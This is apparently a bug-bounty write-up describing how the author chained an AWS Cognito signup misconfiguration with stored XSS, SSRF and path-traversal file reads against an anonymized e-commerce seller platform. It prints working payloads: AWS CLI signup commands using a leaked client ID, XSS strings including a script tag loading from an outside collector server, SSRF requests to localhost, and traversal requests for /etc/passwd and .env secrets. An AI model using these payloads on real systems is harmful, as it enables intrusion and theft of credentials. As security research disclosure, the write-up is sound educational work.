Hi everyone, I hope you're doing well. In this first article, I'll be sharing how I discovered and chained together multiple vulnerabilities that ultimately allowed me to access internal files from a restricted application dashboard.
TL;DR
The web app disallowed self-service signup in the UI, but used AWS Cognito for auth. A second, forgotten Cognito ClientId in publicly-served JS allowed me to sign up and confirm an account via the AWS CLI. After logging in I could call several internal API endpoints (some legacy) and found multiple high-impact issues: stored XSS in product descriptions, an unrestricted SSRF via an image retrieval endpoint, several IDORs and — critically — an LFI in a template/download endpoint that allowed directory traversal to read sensitive files (including .env, Dockerfiles, DB backups).
The Target
It's an e-commerce platform designed for sellers on marketplaces such as eBay and Amazon. It offered features like product and inventory management, as well as order processing and related functionalities.
Recon & initial findings
I opened app.target.com and noticed that the signup UI required an in-person provisioning step with staff, meaning there was no public signup available through the interface. I attempted to log in with random credentials to observe the client-side authentication flows. These requests revealed that the application was using AWS Cognito as its managed identity service. While examining the login request and the JavaScript bundles loaded by the app, I discovered two Cognito ClientId values: one used in the visible login flow, which was disabled for signup, and another referenced elsewhere in the JavaScript that still allowed account creation.
It's important to note that Cognito allows developers to disable signups if they do not want users registering directly - however, misconfigurations in this setting are unfortunately quite common.
Account creation
- Using the discovered
ClientId, signup via AWS CLI:
aws cognito-idp sign-up \
--client-id <client_id> \
--username <username> \
--password '<Password123!>' \
--user-attributes Name=email,Value=<email@example.com> \
--region <region>- Confirm using confirmation code received by email:
aws cognito-idp confirm-sign-up \
--client-id <client_id> \
--username <username> \
--confirmation-code <CODE_FROM_EMAIL> \
--region <region>After confirming the account, I was able to log in through the application as a paid user, gaining full access to all premium features and services.
Post-login: finding sensitive endpoints
Although the UI redirected to a "staff provisioning" waiting page, the app served JS referenced API endpoints. Directly accessing these endpoints (/v1/settings/*, /v1/product/*, etc.) revealed that many were functional without the account being fully provisioned, allowing for further testing.
Stored XSS in product descriptions
The product description field did not properly sanitize input, allowing HTML and JavaScript to be stored and executed.
- Quick confirmation:
"><img src=x onerror=alert(document.cookie);>- Blind XSS payload:
"><script src="http://<bxss-server>/"></script>SSRF via image retrieval endpoint
- Endpoint:
GET /v1/product/images?url=https://assets.target.com/... - This endpoint fetched product images from an S3 bucket (
assets.target.com). - Replaced the
urlparameter with a server I controlled:?url=http://my-server.com/test→ Received an HTTP request from the application's IP.

- Tested for access to internal services:
- AWS Metadata endpoints : No response.
localhost: Successful connection.- Port scanning localhost: Identified several open ports.
- Bypassing Firewall Rules:
A key finding was that the SSRF could bypass Nginx Reverse Proxy. Directly accessing app.target.com/private from my IP returned a 403 Forbidden from Nginx, but when I requested it via the SSRF endpoint (/v1/product/images?url=http://localhost:8080/private) the application processed the request internally and returned a 404 Not Found, confirming the bypass. I used this behavior to fuzz additional internal endpoints; however, the SSRF endpoint was rate-limited, so after some limited fuzzing I didn't find anything further of interest.

Local File Inclusion (LFI)
These legacy endpoints, discovered in the JavaScript files, were used to view and download template files.
By manipulating the view and download parameters with Directory Traversal sequences, it was possible to read any file on the server.
GET /v1/settings/parameters?do=templates&fo=template_2022&download=../../../../../../../../../../etc/passwd
The .env file contained a trove of sensitive credentials, including but not limited to:
- AWS Access/Secret Keys
- SMTP, FTP, and WordPress credentials
- MongoDB and Redis connection strings with passwords
- Stripe API keys
- Salesforce credentials
- Various other application secrets
GET /v1/settings/parameters?do=templates&fo=template_2022&view=../../app/.env&source=true
The Takeaway
This engagement outlines a critical security principle: defense‑in‑depth matters. A single misconfiguration - in this case, a Cognito signup weakness - provided the initial foothold that made it possible to uncover deeper application vulnerabilities.
It's a textbook example of small misconfiguration + exposed legacy endpoints = large impact. Even when the UI blocks a flow (for example, signup), public assets like JavaScript files can hide authentication backdoors.
Don't overcomplicate your testing - try simple payloads first. Many applications are permissive, and straightforward inputs often reveal more than elaborate, heavily encoded payloads.
Thank you for reading, and I hope it taught you something new.
Find me at : https://x.com/pwnx0